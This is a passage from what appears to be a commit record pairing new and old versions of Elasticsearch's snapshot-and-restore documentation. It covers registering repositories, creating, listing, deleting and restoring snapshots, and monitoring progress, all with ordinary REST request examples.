are supported:\n\n[horizontal]\n`url`:: Location of the snapshots. Mandatory.\n\nThe URL repository supports the following protocols: \"http\", \"https\", \"ftp\", \"file\" and \"jar\". URL repositories with `http:`,\n`https:`, and `ftp:` URLs have to be whitelisted by specifying allowed URLs in the `repositories.url.allowed_urls` setting.\nThis setting supports wildcards in the place of host, path, query, and fragment.\n
For example:\n\n[source,yaml]\n-----------------------------------\nrepositories.url.allowed_urls: [\"http:\/\/www.example.org\/root\/*\", \"https:\/\/*.mydomain.com\/*?*#*\"]\n-----------------------------------\n\nURL repositories with `file:` URLs can only point to locations registered in the `path.repo` setting, similar to the\nshared file system repository.\n\n[float]\n===== Repository plugins\n\nOther repository backends are available in these official plugins:\n\n* {plugins}\/repository-s3.html[repository-s3] for S3 repository support\n* {plugins}\/repository-hdfs.html[repository-hdfs] for HDFS repository support in Hadoop environments\n* {plugins}\/repository-azure.html[repository-azure] for Azure storage repositories\n* {plugins}\/repository-gcs.html[repository-gcs] for Google Cloud Storage repositories\n\n[float]\n===== Repository Verification\nWhen a repository is registered, it's immediately verified on all master and data nodes to make sure that it is functional\non all nodes currently present in the cluster. The `verify` parameter can be used to explicitly disable the repository\nverification when registering or updating a repository:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_unverified_backup?verify=false\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_unverified_backup_location\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe verification process can also be executed manually by running the following command:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_unverified_backup\/_verify\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIt returns a list of nodes where the repository was successfully verified, or an error message if the verification process failed.\n\n[float]\n=== Snapshot\n\nA repository can contain multiple snapshots of the same cluster. Snapshots are identified by unique names within the\ncluster. A snapshot with the name `snapshot_1` in the repository `my_backup` can be created by executing the following\ncommand:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1?wait_for_completion=true\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe `wait_for_completion` parameter specifies whether or not the request should return immediately after snapshot\ninitialization (default) or wait for snapshot completion. During snapshot initialization, information about all\nprevious snapshots is loaded into memory, which means that in large repositories it may take several seconds (or\neven minutes) for this command to return even if the `wait_for_completion` parameter is set to `false`.\n\nBy default, a snapshot of all open and started indices in the cluster is created. This behavior can be changed by\nspecifying the list of indices in the body of the snapshot request.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_2?wait_for_completion=true\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": false\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe list of indices that should be included in the snapshot can be specified using the `indices` parameter, which\nsupports <<multi-index,multi index syntax>>. The snapshot request also supports the\n`ignore_unavailable` option.
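\n\nFor instance, because multi index syntax is supported, a wildcard pattern can\nbe used to snapshot a whole family of indices (the snapshot and index names\nbelow are purely illustrative):\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_3?wait_for_completion=true\n{\n \"indices\": \"index_*\",\n \"ignore_unavailable\": true\n}\n-----------------------------------\n\n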
Setting `ignore_unavailable` to `true` will cause indices that do not exist to be ignored during snapshot\ncreation. By default, when the `ignore_unavailable` option is not set and an index is missing, the snapshot request will fail.\nBy setting `include_global_state` to `false` it's possible to prevent the cluster global state from being stored as part of\nthe snapshot. By default, the entire snapshot will fail if one or more indices participating in the snapshot don't have\nall primary shards available. This behaviour can be changed by setting `partial` to `true`.\n\nThe index snapshot process is incremental. In the process of making the index snapshot, Elasticsearch analyses\nthe list of the index files that are already stored in the repository and copies only files that were created or\nchanged since the last snapshot. That allows multiple snapshots to be preserved in the repository in a compact form.\nThe snapshotting process is executed in a non-blocking fashion. All indexing and searching operations can continue to be\nexecuted against the index that is being snapshotted. However, a snapshot represents the point-in-time view of the index\nat the moment when the snapshot was created, so no records that were added to the index after the snapshot process was started\nwill be present in the snapshot. The snapshot process starts immediately for the primary shards that have been started\nand are not relocating at the moment. Before version 1.2.0, the snapshot operation fails if the cluster has any relocating or\ninitializing primaries of indices participating in the snapshot. Starting with version 1.2.0, Elasticsearch waits for\nrelocation or initialization of shards to complete before snapshotting them.\n\nBesides creating a copy of each index, the snapshot process can also store global cluster metadata, which includes persistent\ncluster settings and templates. The transient settings and registered snapshot repositories are not stored as part of\nthe snapshot.\n\nOnly one snapshot process can be executed in the cluster at any time. While a snapshot of a particular shard is being\ncreated, this shard cannot be moved to another node, which can interfere with the rebalancing process and allocation\nfiltering. Elasticsearch will only be able to move a shard to another node (according to the current allocation\nfiltering settings and rebalancing algorithm) once the snapshot is finished.\n\nOnce a snapshot is created, information about this snapshot can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis command returns basic information about the snapshot including start and end time, the version of\nElasticsearch that created the snapshot, the list of included indices, the current state of the\nsnapshot, and the list of failures that occurred during the snapshot.
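\n\nAn abbreviated response has roughly the following shape (the exact set of\nfields varies by version; the values here are invented for illustration):\n\n[source,js]\n-----------------------------------\n{\n \"snapshots\": [\n {\n \"snapshot\": \"snapshot_1\",\n \"state\": \"SUCCESS\",\n \"indices\": [\"index_1\", \"index_2\"],\n \"start_time_in_millis\": 1510000000000,\n \"end_time_in_millis\": 1510000001000,\n \"failures\": []\n }\n ]\n}\n-----------------------------------\n\n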
The snapshot `state` can be one of the following:\n\n[horizontal]\n`IN_PROGRESS`::\n\n The snapshot is currently running.\n\n`SUCCESS`::\n\n The snapshot finished and all shards were stored successfully.\n\n`FAILED`::\n\n The snapshot finished with an error and failed to store any data.\n\n`PARTIAL`::\n\n The global cluster state was stored, but data of at least one shard wasn't stored successfully.\n The `failure` section in this case should contain more detailed information about shards\n that were not processed correctly.\n\n`INCOMPATIBLE`::\n\n The snapshot was created with an old version of Elasticsearch and therefore is incompatible with\n the current version of the cluster.\n\n\nAs with repositories, information about multiple snapshots can be queried in one go, supporting wildcards as well:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_*,some_other_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nAll snapshots currently stored in the repository can be listed using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_all\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe command fails if some of the snapshots are unavailable. The boolean parameter `ignore_unavailable` can be used to\nreturn all snapshots that are currently available.\n\nGetting all snapshots in the repository can be costly on cloud-based repositories,\nboth from a cost and performance perspective. If the only information required is\nthe snapshot names\/uuids in the repository and the indices in each snapshot, then\nthe optional boolean parameter `verbose` can be set to `false` to execute a more\nperformant and cost-effective retrieval of the snapshots in the repository. Note\nthat setting `verbose` to `false` will omit all other information about the snapshot\nsuch as status information, the number of snapshotted shards, etc. The default\nvalue of the `verbose` parameter is `true`.\n\nA currently running snapshot can be retrieved using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_current\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nA snapshot can be deleted from the repository using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_2\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhen a snapshot is deleted from a repository, Elasticsearch deletes all files that are associated with the deleted\nsnapshot and not used by any other snapshots. If the delete snapshot operation is executed while the snapshot is being\ncreated, the snapshotting process will be aborted and all files created as part of the snapshotting process will be\ncleaned. Therefore, the delete snapshot operation can be used to cancel long-running snapshot operations that were\nstarted by mistake.\n\nA repository can be deleted using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_fs_backup\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhen a repository is deleted, Elasticsearch only removes the reference to the location where the repository is storing\nthe snapshots.\n
The snapshots themselves are left untouched and in place.\n\n[float]\n=== Restore\n\nA snapshot can be restored using the following command:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nBy default, all indices in the snapshot are restored, and the cluster state is\n*not* restored. It's possible to select indices that should be restored as well\nas to allow the global cluster state to be restored by using the `indices` and\n`include_global_state` options in the restore request body. The list of indices\nsupports <<multi-index,multi index syntax>>. The `rename_pattern`\nand `rename_replacement` options can also be used to rename indices on restore\nusing a regular expression that supports referencing the original text as\nexplained\nhttp:\/\/docs.oracle.com\/javase\/6\/docs\/api\/java\/util\/regex\/Matcher.html#appendReplacement(java.lang.StringBuffer,%20java.lang.String)[here].\nSet `include_aliases` to `false` to prevent aliases from being restored together\nwith associated indices.\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": true,\n \"rename_pattern\": \"index_(.+)\",\n \"rename_replacement\": \"restored_index_$1\"\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe restore operation can be performed on a functioning cluster. However, an\nexisting index can only be restored if it's <<indices-open-close,closed>> and\nhas the same number of shards as the index in the snapshot. The restore\noperation automatically opens restored indices if they were closed and creates\nnew indices if they didn't exist in the cluster. If the cluster state is restored\nwith `include_global_state` (defaults to `false`), the restored templates that\ndon't currently exist in the cluster are added and existing templates with the\nsame name are replaced by the restored templates. The restored persistent\nsettings are added to the existing persistent settings.\n\n[float]\n==== Partial restore\n\nBy default, the entire restore operation will fail if one or more indices participating in the operation don't have\nsnapshots of all shards available. This can occur, for example, if some shards failed to snapshot. It is still possible to\nrestore such indices by setting `partial` to `true`. Please note that only successfully snapshotted shards will be\nrestored in this case and all missing shards will be recreated empty.\n\n\n[float]\n==== Changing index settings during restore\n\nMost index settings can be overridden during the restore process. For example, the following command will restore\nthe index `index_1` without creating any replicas while switching back to the default refresh interval:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore\n{\n \"indices\": \"index_1\",\n \"index_settings\": {\n \"index.number_of_replicas\": 0\n },\n \"ignore_index_settings\": [\n \"index.refresh_interval\"\n ]\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nPlease note that some settings such as `index.number_of_shards` cannot be changed during the restore operation.\n\n[float]\n==== Restoring to a different cluster\n\nThe information stored in a snapshot is not tied to a particular cluster or a cluster name. Therefore it's possible to\nrestore a snapshot made from one cluster into another cluster. All that is required is registering the repository\ncontaining the snapshot in the new cluster and starting the restore process.
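\n\nFor example, the repository could be registered on the new cluster in\n`readonly` mode first so that the new cluster cannot accidentally modify\nexisting snapshots (a cautious variant of the registration command shown\nearlier on this page):\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup_location\",\n \"readonly\": true\n }\n}\n-----------------------------------\n\n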
The new cluster doesn't have to have the\nsame size or topology. However, the version of the new cluster should be the same or newer (only 1 major version newer) than the cluster that was used to create the snapshot. For example, you can restore a 1.x snapshot to a 2.x cluster, but not a 1.x snapshot to a 5.x cluster.\n\nIf the new cluster has a smaller size, additional considerations should be made. First of all, it's necessary to make sure\nthat the new cluster has enough capacity to store all indices in the snapshot. It's possible to change index settings\nduring restore to reduce the number of replicas, which can help with restoring snapshots into a smaller cluster. It's also\npossible to select only a subset of the indices using the `indices` parameter.\n\nIf indices in the original cluster were assigned to particular nodes using\n<<shard-allocation-filtering,shard allocation filtering>>, the same rules will be enforced in the new cluster. Therefore,\nif the new cluster doesn't contain nodes with appropriate attributes that a restored index can be allocated on, such\nan index will not be successfully restored unless these index allocation settings are changed during the restore operation.\n\nThe restore operation also checks that restored persistent settings are compatible with the current cluster to avoid accidentally\nrestoring incompatible settings such as `discovery.zen.minimum_master_nodes`, which could disable a smaller cluster until the\nrequired number of master-eligible nodes is added. If you need to restore a snapshot with incompatible persistent settings, try\nrestoring it without the global cluster state.\n\n[float]\n=== Snapshot status\n\nA list of currently running snapshots with their detailed status information can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIn this format, the command will return information about all currently running snapshots. By specifying a repository name, it's possible\nto limit the results to a particular repository:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIf both a repository name and a snapshot id are specified, this command will return detailed status information for the given snapshot even\nif it's not currently running:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nMultiple ids are also supported:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1,snapshot_2\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\n[float]\n=== Monitoring snapshot\/restore progress\n\nThere are several ways to monitor the progress of the snapshot and restore processes while they are running. Both\noperations support the `wait_for_completion` parameter, which blocks the client until the operation is completed.
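\n\nFor example, using the repository and snapshot names from earlier on this\npage:\n\n[source,sh]\n-----------------------------------\nPOST \/_snapshot\/my_backup\/snapshot_1\/_restore?wait_for_completion=true\n-----------------------------------\n\n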
Blocking on `wait_for_completion` is the simplest method that can be used to get notified about operation completion.\n\nThe snapshot operation can also be monitored by periodic calls to the snapshot info:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nPlease note that the snapshot info operation uses the same resources and thread pool as the snapshot operation. So,\nexecuting a snapshot info operation while large shards are being snapshotted can cause the snapshot info operation to wait\nfor available resources before returning the result. On very large shards the wait time can be significant.\n\nTo get more immediate and complete information about snapshots, the snapshot status command can be used instead:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\/_status\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhile the snapshot info method returns only basic information about the snapshot in progress, the snapshot status returns a\ncomplete breakdown of the current state for each shard participating in the snapshot.\n\nThe restore process piggybacks on the standard recovery mechanism of Elasticsearch. As a result, standard recovery\nmonitoring services can be used to monitor the state of the restore. When a restore operation is executed, the cluster\ntypically goes into the `red` state. This happens because the restore operation starts with \"recovering\" primary shards of the\nrestored indices. During this operation the primary shards become unavailable, which manifests itself in the `red` cluster\nstate. Once recovery of the primary shards is completed, Elasticsearch switches to the standard replication process that\ncreates the required number of replicas; at this moment the cluster switches to the `yellow` state. Once all required replicas\nare created, the cluster switches to the `green` state.\n\nThe cluster health operation provides only a high-level status of the restore process. It's possible to get more\ndetailed insight into the current state of the recovery process by using the <<indices-recovery, indices recovery>> and\n<<cat-recovery, cat recovery>> APIs.\n\n[float]\n=== Stopping currently running snapshot and restore operations\n\nThe snapshot and restore framework allows running only one snapshot or one restore operation at a time. If a currently\nrunning snapshot was executed by mistake, or takes unusually long, it can be terminated using the snapshot delete operation.\nThe snapshot delete operation checks whether the deleted snapshot is currently running and, if it is, the delete operation stops\nthat snapshot before deleting the snapshot data from the repository.\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe restore operation uses the standard shard recovery mechanism. Therefore, any currently running restore operation can\nbe canceled by deleting indices that are being restored. Please note that data for all deleted indices will be removed\nfrom the cluster as a result of this operation.\n\n[float]\n=== Effect of cluster blocks on snapshot and restore operations\nMany snapshot and restore operations are affected by cluster and index blocks. For example, registering and unregistering\nrepositories require write global metadata access.
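\n\nFor instance, while a cluster-wide metadata block such as the following is in\nplace, registering or unregistering a repository would be rejected (the\nsetting is shown only to illustrate the interaction):\n\n[source,js]\n-----------------------------------\nPUT \/_cluster\/settings\n{\n \"persistent\": {\n \"cluster.blocks.read_only\": true\n }\n}\n-----------------------------------\n\n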
The snapshot operation requires that all indices and their metadata as\nwell as the global metadata be readable. The restore operation requires the global metadata to be writable; however,\nthe index-level blocks are ignored during restore because indices are essentially recreated during restore.\nPlease note that the repository content is not part of the cluster and therefore cluster blocks don't affect internal\nrepository operations such as listing or deleting snapshots from an already registered repository.\n","old_contents":"[[modules-snapshots]]\n== Snapshot And Restore\n\nYou can store snapshots of individual indices or an entire cluster in\na remote repository like a shared file system, S3, or HDFS. These snapshots\nare great for backups because they can be restored relatively quickly. However,\nsnapshots can only be restored to versions of Elasticsearch that can read the\nindices:\n\n* A snapshot of an index created in 5.x can be restored to 6.x.\n* A snapshot of an index created in 2.x can be restored to 5.x.\n* A snapshot of an index created in 1.x can be restored to 2.x.\n\nConversely, snapshots of indices created in 1.x **cannot** be restored to\n5.x or 6.x, and snapshots of indices created in 2.x **cannot** be restored\nto 6.x.\n\nSnapshots are incremental and can contain indices created in various\nversions of Elasticsearch. If any indices in a snapshot were created in an\nincompatible version, you will not be able restore the snapshot.\n\nIMPORTANT: When backing up your data prior to an upgrade, keep in mind that you\nwon't be able to restore snapshots after you upgrade if they contain indices\ncreated in a version that's incompatible with the upgrade version.\n\nIf you end up in a situation where you need to restore a snapshot of an index\nthat is incompatible with the version of the cluster you are currently running,\nyou can restore it on the latest compatible version and use\n<<reindex-from-remote,reindex-from-remote>> to rebuild the index on the current\nversion. Reindexing from remote is only possible if the original index has\nsource enabled. Retrieving and reindexing the data can take significantly longer\nthan simply restoring a snapshot. If you have a large amount of data, we\nrecommend testing the reindex from remote process with a subset of your data to\nunderstand the time requirements before proceeding.\n\n[float]\n=== Repositories\n\nYou must register a snapshot repository before you can perform snapshot and\nrestore operations. We recommend creating a new snapshot repository for each\nmajor version. The valid repository settings depend on the repository type.\n\nIf you register same snapshot repository with multiple clusters, only\none cluster should have write access to the repository. All other clusters\nconnected to that repository should set the repository to `readonly` mode.\n\nNOTE: The snapshot format can change across major versions, so if you have\nclusters on different major versions trying to write the same repository,\nnew snapshots written by one version will not be visible to the other.\n
While\nsetting the repository to `readonly` on all but one of the clusters should work\nwith multiple clusters differing by one major version, it is not a supported\nconfiguration.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup_location\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\nTo retrieve information about a registered repository, use a GET request:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nwhich returns:\n\n[source,js]\n-----------------------------------\n{\n \"my_backup\": {\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup_location\"\n }\n }\n}\n-----------------------------------\n\/\/ TESTRESPONSE\n\nTo retrieve information about multiple repositories, specify a\na comma-delimited list of repositories. You can also use the * wildcard when\nspecifying repository names. For example, the following request retrieves\ninformation about all of the snapshot repositories that start with `repo` or\ncontain `backup`:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/repo*,*backup*\n-----------------------------------\n\/\/ CONSOLE\n\nTo retrieve information about all registered snapshot repositories, omit the\nrepository name or specify `_all`:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\nor\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/_all\n-----------------------------------\n\/\/ CONSOLE\n\n[float]\n===== Shared File System Repository\n\nThe shared file system repository (`\"type\": \"fs\"`) uses the shared file system to store snapshots. In order to register\nthe shared file system repository it is necessary to mount the same shared filesystem to the same location on all\nmaster and data nodes. 
This location (or one of its parent directories) must be registered in the `path.repo`\nsetting on all master and data nodes.\n\nAssuming that the shared filesystem is mounted to `\/mount\/backups\/my_backup`, the following setting should be added to\n`elasticsearch.yml` file:\n\n[source,yaml]\n--------------\npath.repo: [\"\/mount\/backups\", \"\/mount\/longterm_backups\"]\n--------------\n\nThe `path.repo` setting supports Microsoft Windows UNC paths as long as at least server name and share are specified as\na prefix and back slashes are properly escaped:\n\n[source,yaml]\n--------------\npath.repo: [\"\\\\\\\\MY_SERVER\\\\Snapshots\"]\n--------------\n\nAfter all nodes are restarted, the following command can be used to register the shared file system repository with\nthe name `my_backup`:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_fs_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"\/mount\/backups\/my_fs_backup_location\",\n \"compress\": true\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[skip:no access to absolute path]\n\nIf the repository location is specified as a relative path this path will be resolved against the first path specified\nin `path.repo`:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_fs_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_fs_backup_location\",\n \"compress\": true\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe following settings are supported:\n\n[horizontal]\n`location`:: Location of the snapshots. Mandatory.\n`compress`:: Turns on compression of the snapshot files. Compression is applied only to metadata files (index mapping and settings). Data files are not compressed. Defaults to `true`.\n`chunk_size`:: Big files can be broken down into chunks during snapshotting if needed. The chunk size can be specified in bytes or by\n using size value notation, i.e. 1g, 10m, 5k. Defaults to `null` (unlimited chunk size).\n`max_restore_bytes_per_sec`:: Throttles per node restore rate. Defaults to `40mb` per second.\n`max_snapshot_bytes_per_sec`:: Throttles per node snapshot rate. Defaults to `40mb` per second.\n`readonly`:: Makes repository read-only. Defaults to `false`.\n\n[float]\n===== Read-only URL Repository\n\nThe URL repository (`\"type\": \"url\"`) can be used as an alternative read-only way to access data created by the shared file\nsystem repository. The URL specified in the `url` parameter should point to the root of the shared filesystem repository.\nThe following settings are supported:\n\n[horizontal]\n`url`:: Location of the snapshots. Mandatory.\n\nURL Repository supports the following protocols: \"http\", \"https\", \"ftp\", \"file\" and \"jar\". URL repositories with `http:`,\n`https:`, and `ftp:` URLs has to be whitelisted by specifying allowed URLs in the `repositories.url.allowed_urls` setting.\nThis setting supports wildcards in the place of host, path, query, and fragment. 
For example:\n\n[source,yaml]\n-----------------------------------\nrepositories.url.allowed_urls: [\"http:\/\/www.example.org\/root\/*\", \"https:\/\/*.mydomain.com\/*?*#*\"]\n-----------------------------------\n\nURL repositories with `file:` URLs can only point to locations registered in the `path.repo` setting similar to\nshared file system repository.\n\n[float]\n===== Repository plugins\n\nOther repository backends are available in these official plugins:\n\n* {plugins}\/repository-s3.html[repository-s3] for S3 repository support\n* {plugins}\/repository-hdfs.html[repository-hdfs] for HDFS repository support in Hadoop environments\n* {plugins}\/repository-azure.html[repository-azure] for Azure storage repositories\n* {plugins}\/repository-gcs.html[repository-gcs] for Google Cloud Storage repositories\n\n[float]\n===== Repository Verification\nWhen a repository is registered, it's immediately verified on all master and data nodes to make sure that it is functional\non all nodes currently present in the cluster. The `verify` parameter can be used to explicitly disable the repository\nverification when registering or updating a repository:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_unverified_backup?verify=false\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_unverified_backup_location\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe verification process can also be executed manually by running the following command:\n\n[source,js]\n-----------------------------------\nPOST \/_snapshot\/my_unverified_backup\/_verify\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nIt returns a list of nodes where repository was successfully verified or an error message if verification process failed.\n\n[float]\n=== Snapshot\n\nA repository can contain multiple snapshots of the same cluster. Snapshots are identified by unique names within the\ncluster. A snapshot with the name `snapshot_1` in the repository `my_backup` can be created by executing the following\ncommand:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_1?wait_for_completion=true\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe `wait_for_completion` parameter specifies whether or not the request should return immediately after snapshot\ninitialization (default) or wait for snapshot completion. During snapshot initialization, information about all\nprevious snapshots is loaded into the memory, which means that in large repositories it may take several seconds (or\neven minutes) for this command to return even if the `wait_for_completion` parameter is set to `false`.\n\nBy default a snapshot of all open and started indices in the cluster is created. This behavior can be changed by\nspecifying the list of indices in the body of the snapshot request.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\/snapshot_2?wait_for_completion=true\n{\n \"indices\": \"index_1,index_2\",\n \"ignore_unavailable\": true,\n \"include_global_state\": false\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe list of indices that should be included into the snapshot can be specified using the `indices` parameter that\nsupports <<search-multi-index-type,multi index syntax>>. The snapshot request also supports the\n`ignore_unavailable` option. 
Setting it to `true` will cause indices that do not exist to be ignored during snapshot\ncreation. By default, when `ignore_unavailable` option is not set and an index is missing the snapshot request will fail.\nBy setting `include_global_state` to false it's possible to prevent the cluster global state to be stored as part of\nthe snapshot. By default, the entire snapshot will fail if one or more indices participating in the snapshot don't have\nall primary shards available. This behaviour can be changed by setting `partial` to `true`.\n\nThe index snapshot process is incremental. In the process of making the index snapshot Elasticsearch analyses\nthe list of the index files that are already stored in the repository and copies only files that were created or\nchanged since the last snapshot. That allows multiple snapshots to be preserved in the repository in a compact form.\nSnapshotting process is executed in non-blocking fashion. All indexing and searching operation can continue to be\nexecuted against the index that is being snapshotted. However, a snapshot represents the point-in-time view of the index\nat the moment when snapshot was created, so no records that were added to the index after the snapshot process was started\nwill be present in the snapshot. The snapshot process starts immediately for the primary shards that has been started\nand are not relocating at the moment. Before version 1.2.0, the snapshot operation fails if the cluster has any relocating or\ninitializing primaries of indices participating in the snapshot. Starting with version 1.2.0, Elasticsearch waits for\nrelocation or initialization of shards to complete before snapshotting them.\n\nBesides creating a copy of each index the snapshot process can also store global cluster metadata, which includes persistent\ncluster settings and templates. The transient settings and registered snapshot repositories are not stored as part of\nthe snapshot.\n\nOnly one snapshot process can be executed in the cluster at any time. While snapshot of a particular shard is being\ncreated this shard cannot be moved to another node, which can interfere with rebalancing process and allocation\nfiltering. Elasticsearch will only be able to move a shard to another node (according to the current allocation\nfiltering settings and rebalancing algorithm) once the snapshot is finished.\n\nOnce a snapshot is created information about this snapshot can be obtained using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_1\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThis command returns basic information about the snapshot including start and end time, version of\nelasticsearch that created the snapshot, the list of included indices, the current state of the\nsnapshot and the list of failures that occurred during the snapshot. 
The snapshot `state` can be\n\n[horizontal]\n`IN_PROGRESS`::\n\n The snapshot is currently running.\n\n`SUCCESS`::\n\n The snapshot finished and all shards were stored successfully.\n\n`FAILED`::\n\n The snapshot finished with an error and failed to store any data.\n\n`PARTIAL`::\n\n The global cluster state was stored, but data of at least one shard wasn't stored successfully.\n The `failure` section in this case should contain more detailed information about shards\n that were not processed correctly.\n\n`INCOMPATIBLE`::\n\n The snapshot was created with an old version of elasticsearch and therefore is incompatible with\n the current version of the cluster.\n\n\nSimilar as for repositories, information about multiple snapshots can be queried in one go, supporting wildcards as well:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/snapshot_*,some_other_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nAll snapshots currently stored in the repository can be listed using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_all\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe command fails if some of the snapshots are unavailable. The boolean parameter `ignore_unavailable` can be used to\nreturn all snapshots that are currently available.\n\nGetting all snapshots in the repository can be costly on cloud-based repositories,\nboth from a cost and performance perspective. If the only information required is\nthe snapshot names\/uuids in the repository and the indices in each snapshot, then\nthe optional boolean parameter `verbose` can be set to `false` to execute a more\nperformant and cost-effective retrieval of the snapshots in the repository. Note\nthat setting `verbose` to `false` will omit all other information about the snapshot\nsuch as status information, the number of snapshotted shards, etc. The default\nvalue of the `verbose` parameter is `true`.\n\nA currently running snapshot can be retrieved using the following command:\n\n[source,sh]\n-----------------------------------\nGET \/_snapshot\/my_backup\/_current\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nA snapshot can be deleted from the repository using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_backup\/snapshot_2\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhen a snapshot is deleted from a repository, Elasticsearch deletes all files that are associated with the deleted\nsnapshot and not used by any other snapshots. If the deleted snapshot operation is executed while the snapshot is being\ncreated the snapshotting process will be aborted and all files created as part of the snapshotting process will be\ncleaned. Therefore, the delete snapshot operation can be used to cancel long running snapshot operations that were\nstarted by mistake.\n\nA repository can be deleted using the following command:\n\n[source,sh]\n-----------------------------------\nDELETE \/_snapshot\/my_fs_backup\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nWhen a repository is deleted, Elasticsearch only removes the reference to the location where the repository is storing\nthe snapshots. 
